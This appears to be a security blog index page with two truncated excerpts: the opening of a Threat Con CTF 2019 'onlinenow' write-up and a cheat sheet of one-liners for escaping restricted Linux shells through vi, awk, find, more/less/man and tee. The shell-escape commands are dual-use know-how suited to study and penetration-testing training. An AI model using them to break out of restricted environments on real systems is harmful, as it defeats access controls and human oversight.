Cybertalents – threat con ctf 2019 – online now writeup

threat con ctf 2019

So this one was 200 points hard challenge. I guess only one guy was able to do it. I was a little bit disappointed that I was not able to do it on time. Anyway here is the writeup. Let us begin with the URL, the URL for the challenge was http://35.224.115.104/onlinenow/ which is as […]

Escaping Restricted Linux Shells

From vi or vim :set shell=/bin/bash Next, type and execute: :shell Another method is to type: :! /bin/bash From awk awk ‘BEGIN {system(“/bin/sh”)}’ From find find / -name blahblah -exec /bin/awk ‘BEGIN {system(“/bin/sh”)}’ \; From more, less and man ‘! /bin/sh’ ‘!/bin/sh’ ‘!bash’ From tee echo “evil script code” | tee script.sh From your fav […]